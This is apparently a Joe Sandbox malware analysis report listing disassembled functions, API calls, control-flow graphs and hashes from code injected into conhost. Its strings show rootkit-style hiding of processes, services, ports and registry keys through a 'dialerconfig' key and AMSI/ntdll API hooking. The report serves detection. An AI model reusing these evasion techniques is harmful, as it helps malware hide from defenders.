                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                          • String ID:
                                                          • API String ID: 1683269324-0
                                                          • Opcode ID: f925565bd7d4be1ed18a10d933f5cc473e240d0c1127f16e8bee8d0f787d3ad7
                                                          • Instruction ID: 51cedc3a1edaa9a1f4d882f119d1d84ac442923403cee7fb7dfbe4ae4bd87c79
                                                          • Opcode Fuzzy Hash: f925565bd7d4be1ed18a10d933f5cc473e240d0c1127f16e8bee8d0f787d3ad7
                                                          • Instruction Fuzzy Hash: 19114030634602A2F7649B70B62D3D92A90BB5634DF50612595CE816B5EF7CCC7F8B02
                                                          Function 00000146F6AD2AC0 Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000003.2254610774.00000146F6AD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000146F6AD0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_3_146f6ad0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: 8f72cda2533f8c81468787ed5508378e1f4737ebbed7a3ee8edbd934de0862d8
                                                          • Instruction ID: b572ca268c0c6919de6356c2d1f115cc6cbd0eaecf00e1421cc4dcfe034cb51f
                                                          • Opcode Fuzzy Hash: 8f72cda2533f8c81468787ed5508378e1f4737ebbed7a3ee8edbd934de0862d8
                                                          • Instruction Fuzzy Hash: A691027270125087EB648F35E2207ADB792FB56B98F5481249F8E4779CDA38EC2BC701
                                                          Function 00000146F6B01AC8 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 00000146F6B01628: GetProcessHeap.KERNEL32 ref: 00000146F6B01633
                                                            • Part of subcall function 00000146F6B01628: HeapAlloc.KERNEL32 ref: 00000146F6B01642
                                                            • Part of subcall function 00000146F6B01628: RegOpenKeyExW.ADVAPI32 ref: 00000146F6B016B2
                                                            • Part of subcall function 00000146F6B01628: RegOpenKeyExW.ADVAPI32 ref: 00000146F6B016DF
                                                            • Part of subcall function 00000146F6B01628: RegCloseKey.ADVAPI32 ref: 00000146F6B016F9
                                                            • Part of subcall function 00000146F6B01628: RegOpenKeyExW.ADVAPI32 ref: 00000146F6B01719
                                                            • Part of subcall function 00000146F6B01628: RegCloseKey.ADVAPI32 ref: 00000146F6B01734
                                                            • Part of subcall function 00000146F6B01628: RegOpenKeyExW.ADVAPI32 ref: 00000146F6B01754
                                                            • Part of subcall function 00000146F6B01628: RegCloseKey.ADVAPI32 ref: 00000146F6B0176F
                                                            • Part of subcall function 00000146F6B01628: RegOpenKeyExW.ADVAPI32 ref: 00000146F6B0178F
                                                            • Part of subcall function 00000146F6B01628: RegCloseKey.ADVAPI32 ref: 00000146F6B017AA
                                                            • Part of subcall function 00000146F6B01628: RegOpenKeyExW.ADVAPI32 ref: 00000146F6B017CA
                                                          • SleepEx.KERNELBASE ref: 00000146F6B01AE3
                                                            • Part of subcall function 00000146F6B01628: RegCloseKey.ADVAPI32 ref: 00000146F6B017E5
                                                            • Part of subcall function 00000146F6B01628: RegOpenKeyExW.ADVAPI32 ref: 00000146F6B01805
                                                            • Part of subcall function 00000146F6B01628: RegCloseKey.ADVAPI32 ref: 00000146F6B01820
                                                            • Part of subcall function 00000146F6B01628: RegOpenKeyExW.ADVAPI32 ref: 00000146F6B01840
                                                            • Part of subcall function 00000146F6B01628: RegCloseKey.ADVAPI32 ref: 00000146F6B0185B
                                                            • Part of subcall function 00000146F6B01628: RegOpenKeyExW.ADVAPI32 ref: 00000146F6B0187B
                                                            • Part of subcall function 00000146F6B01628: RegCloseKey.ADVAPI32 ref: 00000146F6B01896
                                                            • Part of subcall function 00000146F6B01628: RegCloseKey.ADVAPI32 ref: 00000146F6B018A0
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: CloseOpen$Heap$AllocProcessSleep
                                                          • String ID:
                                                          • API String ID: 948135145-0
                                                          • Opcode ID: 65153283aa6c96ced916157d2f86422634ff98b4549c9c2683df96b80b9c3d6c
                                                          • Instruction ID: be59e10a0c1fcdc56d45c2691308c28a0a3cc9a52ee0e711111c1862e5128af4
                                                          • Opcode Fuzzy Hash: 65153283aa6c96ced916157d2f86422634ff98b4549c9c2683df96b80b9c3d6c
                                                          • Instruction Fuzzy Hash: 70312A7163160172FB58AB76F7703D91794A786BC8F4460119E8D877B5EF20CC7A8252

                                                          Non-executed Functions

                                                          Function 00000146F6B02BF4 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256stringlibraryloaderCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 205 146f6b02bf4-146f6b02c6d 207 146f6b02f88-146f6b02fab 205->207 208 146f6b02c73-146f6b02c79 205->208 208->207 209 146f6b02c7f-146f6b02c82 208->209 209->207 210 146f6b02c88-146f6b02c8b 209->210 210->207 211 146f6b02c91-146f6b02ca1 GetModuleHandleA 210->211 212 146f6b02ca3-146f6b02cb3 GetProcAddress 211->212 213 146f6b02cb5 211->213 214 146f6b02cb8-146f6b02cd6 212->214 213->214 214->207 216 146f6b02cdc-146f6b02cfb StrCmpNIW 214->216 216->207 217 146f6b02d01-146f6b02d05 216->217 217->207 218 146f6b02d0b-146f6b02d15 217->218 218->207 219 146f6b02d1b-146f6b02d22 218->219 219->207 220 146f6b02d28-146f6b02d3b 219->220 221 146f6b02d4b 220->221 222 146f6b02d3d-146f6b02d49 220->222 223 146f6b02d4e-146f6b02d52 221->223 222->223 224 146f6b02d62 223->224 225 146f6b02d54-146f6b02d60 223->225 226 146f6b02d65-146f6b02d6f 224->226 225->226 227 146f6b02e55-146f6b02e59 226->227 228 146f6b02d75-146f6b02d78 226->228 231 146f6b02f7a-146f6b02f82 227->231 232 146f6b02e5f-146f6b02e62 227->232 229 146f6b02d8a-146f6b02d94 228->229 230 146f6b02d7a-146f6b02d87 call 146f6b01934 228->230 234 146f6b02d96-146f6b02da3 229->234 235 146f6b02dc8-146f6b02dd2 229->235 230->229 231->207 231->220 236 146f6b02e73-146f6b02e7d 232->236 237 146f6b02e64-146f6b02e70 call 146f6b01934 232->237 234->235 241 146f6b02da5-146f6b02db2 234->241 242 146f6b02e02-146f6b02e05 235->242 243 146f6b02dd4-146f6b02de1 235->243 238 146f6b02ead-146f6b02eb0 236->238 239 146f6b02e7f-146f6b02e8c 236->239 237->236 246 146f6b02ebd-146f6b02eca lstrlenW 238->246 247 146f6b02eb2-146f6b02ebb call 146f6b01bc8 238->247 239->238 245 146f6b02e8e-146f6b02e9b 239->245 248 146f6b02db5-146f6b02dbb 241->248 251 146f6b02e07-146f6b02e11 call 146f6b01bc8 242->251 252 146f6b02e13-146f6b02e20 lstrlenW 242->252 243->242 249 146f6b02de3-146f6b02df0 243->249 254 146f6b02e9e-146f6b02ea4 245->254 260 146f6b02ecc-146f6b02edb call 146f6b01c00 246->260 261 146f6b02edd-146f6b02ee7 call 146f6b03c74 246->261 247->246 265 146f6b02ef2-146f6b02efd 247->265 258 146f6b02e4b-146f6b02e50 248->258 259 146f6b02dc1-146f6b02dc6 248->259 262 146f6b02df3-146f6b02df9 249->262 251->252 251->258 255 146f6b02e22-146f6b02e31 call 146f6b01c00 252->255 256 146f6b02e33-146f6b02e45 call 146f6b03c74 252->256 264 146f6b02ea6-146f6b02eab 254->264 254->265 255->256 255->258 256->258 269 146f6b02eea-146f6b02eec 256->269 258->269 259->235 259->248 260->261 260->265 261->269 262->258 272 146f6b02dfb-146f6b02e00 262->272 264->238 264->254 273 146f6b02eff-146f6b02f03 265->273 274 146f6b02f74-146f6b02f78 265->274 269->231 269->265 272->242 272->262 279 146f6b02f0b-146f6b02f25 call 146f6b089f0 273->279 280 146f6b02f05-146f6b02f09 273->280 274->231 281 146f6b02f28-146f6b02f2b 279->281 280->279 280->281 284 146f6b02f2d-146f6b02f4b call 146f6b089f0 281->284 285 146f6b02f4e-146f6b02f51 281->285 284->285 285->274 287 146f6b02f53-146f6b02f71 call 146f6b089f0 285->287 287->274
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                          • API String ID: 2119608203-3850299575
                                                          • Opcode ID: eeb4c9d13e4d9331326a316f022dbcf34e2f04a28c739e06152b1c27ab991b03
                                                          • Instruction ID: a8973a0723123a1e7873ada1854a2eefcb06123bcf56c086b7f37613088a03d7
                                                          • Opcode Fuzzy Hash: eeb4c9d13e4d9331326a316f022dbcf34e2f04a28c739e06152b1c27ab991b03
                                                          • Instruction Fuzzy Hash: 57B1A032230650A2EB698F35E7607D96FA4FB46B88F406116EE8D537A4DB34CC6EC341
                                                          Function 00000146F6B081C0 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                          • String ID:
                                                          • API String ID: 3140674995-0
                                                          • Opcode ID: 83b7811ed3dfc20f87799ca4d6a8862c7cd88f8e2de3ef0f3c1075f59fefca25
                                                          • Instruction ID: 041698779511a647415a8b1b96deda8212bcb4ccb3cadc807996dfa00b11d972
                                                          • Opcode Fuzzy Hash: 83b7811ed3dfc20f87799ca4d6a8862c7cd88f8e2de3ef0f3c1075f59fefca25
                                                          • Instruction Fuzzy Hash: B0316F72214B809AEB609F70F8603ED7764F789748F44402ADA8E47BA5EF38CA5DC711
                                                          Function 00000146F6B0D6D4 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                          • String ID:
                                                          • API String ID: 1239891234-0
                                                          • Opcode ID: 73b818fc325fecaacad8de34b866da11aee815d79a746152a1b7109c0a3c76cf
                                                          • Instruction ID: 7da2fdef6d95e8e511b4c27c9a2df848831a65ade73be63cf468da36c4b58037
                                                          • Opcode Fuzzy Hash: 73b818fc325fecaacad8de34b866da11aee815d79a746152a1b7109c0a3c76cf
                                                          • Instruction Fuzzy Hash: 14316132224B8095DB609F35F8503DE77A4F78A758F501225EA9D43BA5EF38C56ACB01
                                                          Function 00000146F6B01628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                          • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                          • API String ID: 2135414181-2879589442
                                                          • Opcode ID: 50c73d645853b92a642b33fc6a066fdc959384cfa368f387aec294c2099e88a8
                                                          • Instruction ID: b39c5a254e16ff0d48ef13427563e886b9409c68beba5dd03a6ad50f611a657f
                                                          • Opcode Fuzzy Hash: 50c73d645853b92a642b33fc6a066fdc959384cfa368f387aec294c2099e88a8
                                                          • Instruction Fuzzy Hash: 25711E36720A10A6EB10DF75F8A46D92764F786B8CF002111DE8E57B79EF38C96AC741
                                                          Function 00000146F6B01D40 Relevance: 31.6, APIs: 1, Strings: 17, Instructions: 80threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • GetCurrentThread.KERNEL32 ref: 00000146F6B01D4B
                                                            • Part of subcall function 00000146F6B020C4: GetModuleHandleA.KERNEL32(?,?,?,00000146F6B01D7D), ref: 00000146F6B020DC
                                                            • Part of subcall function 00000146F6B020C4: GetProcAddress.KERNEL32(?,?,?,00000146F6B01D7D), ref: 00000146F6B020ED
                                                            • Part of subcall function 00000146F6B05F60: GetCurrentThreadId.KERNEL32 ref: 00000146F6B05F9B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread$AddressHandleModuleProc
                                                          • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                          • API String ID: 4175298099-4225371247
                                                          • Opcode ID: 89246b417a86cb3eef481aa141f8dfd28da3205d5bec25beb87351269da72666
                                                          • Instruction ID: cce7ec61143fbbd942882ab3f135094c313388dc1512fcb324c1f9a6883e03eb
                                                          • Opcode Fuzzy Hash: 89246b417a86cb3eef481aa141f8dfd28da3205d5bec25beb87351269da72666
                                                          • Instruction Fuzzy Hash: 684190B4134A1AB0EA09EB74FB716D42B60B70278CF902513959D432B5AE78CE6FC353
                                                          Function 00000146F6B012BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                          • String ID: d
                                                          • API String ID: 2005889112-2564639436
                                                          • Opcode ID: cc1628f5bdf40f209b9d07d80321b7de87e74088023d72a2e45934eb7399fe90
                                                          • Instruction ID: 03ea934e9de3104860205942670df6cbdc1e68b4b794af166bdef8ffce4747f5
                                                          • Opcode Fuzzy Hash: cc1628f5bdf40f209b9d07d80321b7de87e74088023d72a2e45934eb7399fe90
                                                          • Instruction Fuzzy Hash: 30514E32210B8496EB54CF72F55839AB7A1F78AB9DF045124DE8907728EF3CC46ACB01
                                                          Function 00000146F6AD6D40 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 230COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000003.2254610774.00000146F6AD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000146F6AD0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_3_146f6ad0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                          • String ID: destructor'$ned$restrict(
                                                          • API String ID: 190073905-924718728
                                                          • Opcode ID: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                          • Instruction ID: ba710e4dbac96daf37ede1953dd8af9b54bb538ea984b992f904f05ca8003818
                                                          • Opcode Fuzzy Hash: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                          • Instruction Fuzzy Hash: A781B131A0064186FA549B76B8713D962A2AB9B78CF146015ADCC437B6DF39CC7F9703
                                                          Function 00000146F6B0D258 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 158 146f6b0d258-146f6b0d27a GetLastError 159 146f6b0d299-146f6b0d2a4 FlsSetValue 158->159 160 146f6b0d27c-146f6b0d287 FlsGetValue 158->160 163 146f6b0d2a6-146f6b0d2a9 159->163 164 146f6b0d2ab-146f6b0d2b0 159->164 161 146f6b0d289-146f6b0d291 160->161 162 146f6b0d293 160->162 165 146f6b0d305-146f6b0d310 SetLastError 161->165 162->159 163->165 166 146f6b0d2b5 call 146f6b0dafc 164->166 167 146f6b0d312-146f6b0d324 165->167 168 146f6b0d325-146f6b0d33b call 146f6b0cb78 165->168 169 146f6b0d2ba-146f6b0d2c6 166->169 181 146f6b0d358-146f6b0d363 FlsSetValue 168->181 182 146f6b0d33d-146f6b0d348 FlsGetValue 168->182 171 146f6b0d2d8-146f6b0d2e2 FlsSetValue 169->171 172 146f6b0d2c8-146f6b0d2cf FlsSetValue 169->172 173 146f6b0d2f6-146f6b0d300 call 146f6b0cfc4 call 146f6b0db74 171->173 174 146f6b0d2e4-146f6b0d2f4 FlsSetValue 171->174 176 146f6b0d2d1-146f6b0d2d6 call 146f6b0db74 172->176 173->165 174->176 176->163 187 146f6b0d3c8-146f6b0d3cf call 146f6b0cb78 181->187 188 146f6b0d365-146f6b0d36a 181->188 185 146f6b0d34a-146f6b0d34e 182->185 186 146f6b0d352 182->186 185->187 190 146f6b0d350 185->190 186->181 191 146f6b0d36f call 146f6b0dafc 188->191 193 146f6b0d3bf-146f6b0d3c7 190->193 194 146f6b0d374-146f6b0d380 191->194 195 146f6b0d392-146f6b0d39c FlsSetValue 194->195 196 146f6b0d382-146f6b0d389 FlsSetValue 194->196 198 146f6b0d39e-146f6b0d3ae FlsSetValue 195->198 199 146f6b0d3b0-146f6b0d3b8 call 146f6b0cfc4 195->199 197 146f6b0d38b-146f6b0d390 call 146f6b0db74 196->197 197->187 198->197 199->193 204 146f6b0d3ba call 146f6b0db74 199->204 204->193
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,?,00000146F6B10E9B,?,?,?,00000146F6B1088C,?,?,?,00000146F6B0CC7F), ref: 00000146F6B0D267
                                                          • FlsGetValue.KERNEL32(?,?,?,00000146F6B10E9B,?,?,?,00000146F6B1088C,?,?,?,00000146F6B0CC7F), ref: 00000146F6B0D27C
                                                          • FlsSetValue.KERNEL32(?,?,?,00000146F6B10E9B,?,?,?,00000146F6B1088C,?,?,?,00000146F6B0CC7F), ref: 00000146F6B0D29D
                                                          • FlsSetValue.KERNEL32(?,?,?,00000146F6B10E9B,?,?,?,00000146F6B1088C,?,?,?,00000146F6B0CC7F), ref: 00000146F6B0D2CA
                                                          • FlsSetValue.KERNEL32(?,?,?,00000146F6B10E9B,?,?,?,00000146F6B1088C,?,?,?,00000146F6B0CC7F), ref: 00000146F6B0D2DB
                                                          • FlsSetValue.KERNEL32(?,?,?,00000146F6B10E9B,?,?,?,00000146F6B1088C,?,?,?,00000146F6B0CC7F), ref: 00000146F6B0D2EC
                                                          • SetLastError.KERNEL32(?,?,?,00000146F6B10E9B,?,?,?,00000146F6B1088C,?,?,?,00000146F6B0CC7F), ref: 00000146F6B0D307
                                                          • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000146F6B10E9B,?,?,?,00000146F6B1088C,?,?,?,00000146F6B0CC7F), ref: 00000146F6B0D33D
                                                          • FlsSetValue.KERNEL32(?,?,00000001,00000146F6B0F0FC,?,?,?,?,00000146F6B0C3CF,?,?,?,?,?,00000146F6B07EE0), ref: 00000146F6B0D35C
                                                            • Part of subcall function 00000146F6B0DAFC: HeapAlloc.KERNEL32(?,?,00000000,00000146F6B0D432,?,?,?,00000146F6B0DAE5,?,?,?,?,00000146F6B0DBA8), ref: 00000146F6B0DB51
                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000146F6B10E9B,?,?,?,00000146F6B1088C,?,?,?,00000146F6B0CC7F), ref: 00000146F6B0D384
                                                            • Part of subcall function 00000146F6B0DB74: HeapFree.KERNEL32(?,?,?,?,?,?,?,00000146F6B0643A), ref: 00000146F6B0DB8A
                                                            • Part of subcall function 00000146F6B0DB74: GetLastError.KERNEL32(?,?,?,?,?,?,?,00000146F6B0643A), ref: 00000146F6B0DB94
                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000146F6B10E9B,?,?,?,00000146F6B1088C,?,?,?,00000146F6B0CC7F), ref: 00000146F6B0D395
                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000146F6B10E9B,?,?,?,00000146F6B1088C,?,?,?,00000146F6B0CC7F), ref: 00000146F6B0D3A6
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Value$ErrorLast$Heap$AllocFree
                                                          • String ID:
                                                          • API String ID: 570795689-0
                                                          • Opcode ID: ed67185a8b28226d4ae9e946df9fda9d74e56255075e212544000e561ebf9f9b
                                                          • Instruction ID: 683bc0372eab17cde8d1f4e855a5ada70ecbce6b2aedc972daacec78ecfb5b25
                                                          • Opcode Fuzzy Hash: ed67185a8b28226d4ae9e946df9fda9d74e56255075e212544000e561ebf9f9b
                                                          • Instruction Fuzzy Hash: A241843032528462F968A33177753E92A519B4B7BCF147724ADBE466F6DE248C3B4203
                                                          Function 00000146F6B02FAC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$CounterInfoProcess$AllocFree
                                                          • String ID: \GPU user(*)\Running Time
                                                          • API String ID: 1943346504-1805530042
                                                          • Opcode ID: 7a97016342490a0645e117d0aabf47d1727a4fd40327ed8f0cace4092c4eefd3
                                                          • Instruction ID: d1dd2e42791b8172372fe0b9377aa6de00e96a97b64d439719e9479396d9999c
                                                          • Opcode Fuzzy Hash: 7a97016342490a0645e117d0aabf47d1727a4fd40327ed8f0cace4092c4eefd3
                                                          • Instruction Fuzzy Hash: 5231C532624A41A6F720CF32B9183D9A7A0F78AB99F4411259ECD43634EF38C86B8741
